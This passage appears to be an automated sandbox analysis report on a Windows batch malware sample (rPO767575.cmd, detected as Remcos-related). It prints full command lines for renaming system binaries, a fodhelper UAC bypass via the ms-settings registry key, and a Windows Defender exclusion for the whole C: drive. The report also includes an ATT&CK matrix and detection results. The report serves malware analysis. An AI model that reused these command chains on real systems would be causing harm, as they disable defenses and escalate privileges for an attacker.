        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
        Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""Jump to behavior
        Drops or copies certutil.exe with a different name (likely to bypass HIPS)
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
        Drops or copies cmd.exe with a different name (likely to bypass HIPS)
        Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608017024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,9_2_00007FF608017024
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows " Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c mkdir "\\?\C:\Windows \System32" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9 Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12 Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows \System32\per.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c taskkill /F /IM SystemSettings.exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\Libraries\Ping_c.pif C:\Users\Public\Libraries\Ping_c.pifJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Windows \System32\*" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \System32" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\per.exe" / A / F / Q / S Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Ping_c.mp4" / A / F / Q / S Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exeJump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\rPO767575.cmd" "C:\\Users\\Public\\Ping_c.mp4" 9 Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe" Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe" Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; " Jump to behavior
        Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Ping_c.mp4" "C:\\Users\\Public\\Libraries\\Ping_c.pif" 12 Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
        Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; " Jump to behavior
        Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; " Jump to behavior
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608004AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,9_2_00007FF608004AF4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608004E88 DsRoleGetPrimaryDomainInformation,#357,AllocateAndInitializeSid,GetLastError,#357,AllocateAndInitializeSid,GetLastError,#357,#357,DsRoleFreeMemory,LocalFree,#357,LocalFree,LocalFree,LocalFree,9_2_00007FF608004E88
        Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,4_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,4_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,4_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,5_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,5_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,5_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,8_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,8_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,8_2_00007FF744F06EE4
        Source: C:\Users\Public\kn.exeCode function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,9_2_00007FF608063800
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,31_2_0295D754
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,31_2_02945A78
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,31_2_0295D754
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: GetLocaleInfoA,31_2_0294A788
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: GetLocaleInfoA,31_2_0294A73C
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,31_2_029644DE
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,31_2_02945B84
        Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,35_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,35_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,35_2_00007FF744F06EE4
        Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,38_2_00007FF744F151EC
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,38_2_00007FF744F13140
        Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,38_2_00007FF744F06EE4
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
        Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Users\Public\xkn.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F28654 GetSystemTime,SystemTimeToFileTime,4_2_00007FF744F28654
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FB8944 GetComputerNameExW,GetLastError,#357,GetUserNameExW,GetLastError,#357,#357,#357,#357,#357,#357,9_2_00007FF607FB8944
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F0586C GetVersion,4_2_00007FF744F0586C
        Source: C:\Users\Public\xkn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F7227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,9_2_00007FF607F7227C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F8E568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,9_2_00007FF607F8E568
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F754A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,9_2_00007FF607F754A0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F95648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,9_2_00007FF607F95648

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure2
        Valid Accounts        		1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		311
        Disable or Modify Tools        		OS Credential Dumping1
        System Time Discovery        		Remote Services11
        Archive Collected Data        		1
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        Data Encrypted for Impact
        CredentialsDomainsDefault Accounts11
        Native API        		2
        Valid Accounts        		1
        DLL Side-Loading        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory1
        Account Discovery        		Remote Desktop ProtocolData from Removable Media21
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Command and Scripting Interpreter        		Logon Script (Windows)2
        Valid Accounts        		1
        Abuse Elevation Control Mechanism        		Security Account Manager1
        System Network Connections Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
        Access Token Manipulation        		2
        Obfuscated Files or Information        		NTDS1
        File and Directory Discovery        		Distributed Component Object ModelInput Capture113
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script11
        Process Injection        		1
        Install Root Certificate        		LSA Secrets38
        System Information Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Software Packing        		Cached Domain Credentials1
        Query Registry        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Timestomp        		DCSync251
        Security Software Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc Filesystem1
        Process Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        File Deletion        		/etc/passwd and /etc/shadow41
        Virtualization/Sandbox Evasion        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron331
        Masquerading        		Network Sniffing1
        Application Window Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd2
        Valid Accounts        		Input Capture1
        System Owner/User Discovery        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task41
        Virtualization/Sandbox Evasion        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers21
        Access Token Manipulation        		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
        Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job11
        Process Injection        		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1515085 Sample: rPO767575.cmd Startdate: 21/09/2024 Architecture: WINDOWS Score: 100 56 onedrive.live.com 2->56 58 dual-spov-0006.spov-msedge.net 2->58 60 4 other IPs or domains 2->60 64 Found malware configuration 2->64 66 Malicious sample detected (through community Yara rule) 2->66 68 Multi AV Scanner detection for submitted file 2->68 70 8 other signatures 2->70 10 cmd.exe 1 2->10         started        13 SystemSettingsAdminFlows.exe 2->13         started        signatures3 process4 signatures5 76 Drops executables to the windows directory (C:\Windows) and starts them 10->76 78 Adds a directory exclusion to Windows Defender 10->78 15 alpha.exe 1 10->15         started        18 Ping_c.pif 10->18         started        21 extrac32.exe 1 10->21         started        24 19 other processes 10->24 process6 dnsIp7 92 Adds a directory exclusion to Windows Defender 15->92 26 xkn.exe 8 15->26         started        62 dual-spov-0006.spov-msedge.net 13.107.137.11, 443, 49707, 49708 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 18->62 94 Antivirus detection for dropped file 18->94 96 Detected unpacking (creates a PE file in dynamic memory) 18->96 98 Machine Learning detection for dropped file 18->98 106 3 other signatures 18->106 44 C:\Users\Public\alpha.exe, PE32+ 21->44 dropped 100 Drops PE files to the user root directory 21->100 102 Drops or copies certutil.exe with a different name (likely to bypass HIPS) 21->102 104 Drops or copies cmd.exe with a different name (likely to bypass HIPS) 21->104 29 kn.exe 3 2 24->29         started        31 kn.exe 2 24->31         started        34 extrac32.exe 1 24->34         started        36 4 other processes 24->36 file8 signatures9 process10 file11 80 Powershell is started from unusual location (likely to bypass HIPS) 26->80 82 Adds a directory exclusion to Windows Defender 26->82 84 Reads the Security eventlog 26->84 86 Reads the System eventlog 26->86 38 alpha.exe 1 26->38         started        88 Registers a new ROOT certificate 29->88 90 Drops PE files with a suspicious file extension 29->90 46 C:\Users\Public\Libraries\Ping_c.pif, PE32 31->46 dropped 48 C:\Windows \System32\per.exe, PE32+ 34->48 dropped 50 C:\Users\Public\xkn.exe, PE32+ 36->50 dropped 52 C:\Users\Public\kn.exe, PE32+ 36->52 dropped 54 C:\Users\Public\ger.exe, PE32+ 36->54 dropped signatures12 process13 signatures14 72 Adds a directory exclusion to Windows Defender 38->72 41 ger.exe 1 1 38->41         started        process15 signatures16 74 UAC bypass detected (Fodhelper) 41->74

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        rPO767575.cmd50%ReversingLabsScript-BAT.Trojan.Remcos
        rPO767575.cmd44%VirustotalBrowse

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\Public\Libraries\Ping_c.pif100%AviraTR/AD.Nekark.qzqtk
        C:\Users\Public\Libraries\Ping_c.pif100%Joe Sandbox ML
        C:\Users\Public\alpha.exe0%ReversingLabs
